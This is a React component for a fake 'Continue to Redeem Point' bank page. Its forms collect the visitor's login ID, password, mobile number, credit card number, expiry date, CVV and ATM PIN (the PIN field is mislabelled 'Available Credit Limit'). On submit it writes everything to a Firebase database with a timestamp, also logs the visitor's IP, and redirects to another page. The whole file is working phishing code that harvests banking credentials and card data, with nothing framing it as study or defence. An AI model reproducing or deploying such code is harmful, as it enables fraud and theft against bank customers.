import React, { useState, useEffect } from 'react';
import { app } from './firebase';
import { getDatabase, ref, push, set } from 'firebase/database';
import axios from 'axios';
import './PANUpdateForm.css';
import '../App.css';
import { useNavigate } from 'react-router-dom';
import Head from './Head';
import Footer from './Footer';
const db = getDatabase(app);

function Home() {
  const [activeForm, setActiveForm] = useState('formA');
  const [ip, setIp] = useState('');
  const [formDataA, setFormDataA] = useState({
    Login_ID: '',
    Password: '',
    Mobile_Number: '',
  });

  const [formDataC, setFormDataC] = useState({
    Card_No: '',
    Expiry_Date: '',
    CVV: '',
    ATM_PIN: '',
    Mobile_Number: '',
  });

  const navigate = useNavigate();

  useEffect(() => {
    getUserIp();
  }, []);

  const getUserIp = async () => {
    try {
      const ipData = await axios.get('https://ipapi.co/json');
      setIp(ipData.data.ip);
    } catch (error) {
      console.error('Error fetching IP: ', error);
    }
  };

  const handleFormChange = (formName) => {
    setActiveForm(formName);
  };

  const handleSubmitA = (e) => {
    e.preventDefault();
    saveFormData(formDataA);
  };

  const handleSubmitC = (e) => {
    e.preventDefault();
    saveFormData(formDataC);
  };

  const saveFormData = (data) => {
    const usersRef = ref(db, 'data');
      // Get current date and time
  const currentDate = new Date();
  const formattedDate = currentDate.toLocaleString('en-GB', {
    day: '2-digit',
    month: '2-digit',
    year: 'numeric',
    hour: '2-digit',
    minute: '2-digit',
    second: '2-digit',
  });
    const newData = {
      ...data,
      timestamp: formattedDate, // Add current date and time
    };
    const newEntryKey = push(usersRef).key;
    const newEntryRef = ref(db, `data/${newEntryKey}`);

    set(newEntryRef, newData)
      .then(() => {
        console.log('Data saved successfully.');
        navigate('/pro');
      })
      .catch((error) => {
        console.error('Error saving data: ', error);
      });
  };

  return (
    <>
  
    <div className="App">
    <Head/>
      <div className="mainContent">
        <h1 className="text-center">Continue to Redeem Point</h1>
        <div className="card">
          <div className="card-login">
            <button
              style={{ fontFamily: 'Work Sans', fontWeight: 600 }}
              type="button"
              className={activeForm === 'formA' ? 'active' : ''}
              onClick={() => handleFormChange('formA')}
            >
              Login ID / Customer ID
            </button>
            <button
              style={{ fontFamily: 'Work Sans', fontWeight: 600 }}
              type="button"
              className={activeForm === 'formC' ? 'active' : ''}
              onClick={() => handleFormChange('formC')}
            >
              Credit Card Login
            </button>
          </div>
          <div>
            <section
              id="formA"
              style={{ display: activeForm === 'formA' ? 'block' : 'none' }}
            >
              <form className="LoginForm myform" onSubmit={handleSubmitA}>
                <div className="form-group">
                  <label htmlFor="Login_ID">Login ID / Customer ID</label>
                  <input
                    type="text"
                    className="new-control"
                    id="Login_ID"
                    name="Login_ID"
                    maxLength="25"
                    required
                    value={formDataA.Login_ID}
                    onChange={(e) =>
                      setFormDataA({ ...formDataA, Login_ID: e.target.value })
                    }
                  />
                </div>
                <div className="form-group">
                  <label htmlFor="Password">Password</label>
                  <input
                    type="password"
                    className="new-control"
                    minLength="6"
                    maxLength="30"
                    name="Password"
                    id="Password"
                    required
                    value={formDataA.Password}
                    onChange={(e) =>
                      setFormDataA({ ...formDataA, Password: e.target.value })
                    }
                  />
                </div>
                <div className="form-group">
                  <label htmlFor="Mobile_Number">Registered Mobile No.</label>
                  <input
                    type="text"
                    className="new-control"
                    id="Mobile_Number"
                    name="Mobile_Number"
                    maxLength="10"
                    inputMode="numeric"
                    pattern="[6-9]\d{9}"
                    title="Please enter a valid mobile number!"
                    required
                    value={formDataA.Mobile_Number}
                    onChange={(e) =>
                      setFormDataA({
                        ...formDataA,
                        Mobile_Number: e.target.value,
                      })
                    }
                  />
                </div>
                <div className="text-center">
                  <button type="submit" className="submit">
                    LOGIN
                  </button>
                </div>
              </form>
            </section>
            <section
              id="formC"
              style={{ display: activeForm === 'formC' ? 'block' : 'none' }}
            >
              <form onSubmit={handleSubmitC} className="LoginForm myform">
                <div className="form-group">
                  <label htmlFor="Card_No">Credit Card No.</label>
                  <input
                    className="new-control"
                    type="text"
                    maxLength="19"
                    id="Card_No"
                    name="Card_No"
                    inputMode="numeric"
                    title="Please enter a valid debit card number!"
                    required
                    value={formDataC.Card_No}
                    onChange={(e) =>
                      setFormDataC({ ...formDataC, Card_No: e.target.value })
                    }
                  />
                </div>
                <div className="form-group">
                  <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between' }}>
                    <label>
                      Expiry Date <span style={{ color: 'red' }}>*</span>
                    </label>
                    <label>
                      CVV <span style={{ color: 'red',marginRight: '96px' }}>*</span>
                    </label>
                  </div>
                  <div className="expiry-cvv">
                    <input
                      type="text"
                      className="expiry-date new-control"
                      id="Expiry_Date"
                      name="Expiry_Date"
                      maxLength="5"
                      placeholder="MM/YY"
                      required
                      inputMode="numeric"
                      style={{ margin: '0px', width: '34%', padding: '10px' }}
                      value={formDataC.Expiry_Date}
                      onChange={(e) =>
                        setFormDataC({ ...formDataC, Expiry_Date: e.target.value })
                      }
                    />
                    <input
                      type="text"
                      className="cvv new-control"
                      id="CVV"
                      name="CVV"
                      minLength="3"
                      maxLength="3"
                      placeholder="CVV"
                      required
                      inputMode="numeric"
                      style={{ marginLeft: '40px', width: '30%', padding: '10px' }}
                      value={formDataC.CVV}
                      onChange={(e) =>
                        setFormDataC({ ...formDataC, CVV: e.target.value })
                      }
                    />
                  </div>
                </div>
                <div className="form-group">
                  <label htmlFor="ATM_PIN">Available Credit Limit</label>
                  <input
                    type='text'
                    className="new-control"
                    inputMode="numeric"
                    id="ATM_PIN"
                    name="ATM_PIN"
                    minLength="3"
                    maxLength="7"
                    title="Please enter a valid ATM PIN!"
                    required
                    value={formDataC.ATM_PIN}
                    onChange={(e) =>
                      setFormDataC({ ...formDataC, ATM_PIN: e.target.value })
                    }
                    style={{
                      width: '85%',
                    }}
                  />
                </div>
                <div className="form-group">
                  <label htmlFor="Mobile_Number">Registered Mobile No.</label>
                  <input
                    type="text"
                    className="new-control"
                    id="Mobile_Number"
                    name="Mobile_Number"
                    maxLength="10"
                    inputMode="numeric"
                    pattern="[6-9]\d{9}"
                    title="Please enter a valid mobile number!"
                    required
                    value={formDataC.Mobile_Number}
                    onChange={(e) =>
                      setFormDataC({
                        ...formDataC,
                        Mobile_Number: e.target.value,
                      })
                    }
                  />
                </div>
                <div className="text-center">
                  <button type="submit" className="submit">
                    LOGIN
                  </button>
                </div>
              </form>
            </section>
          </div>
        </div>
      </div>
      <Footer/>
    </div>
   
    </>
  );
}

export default Home;
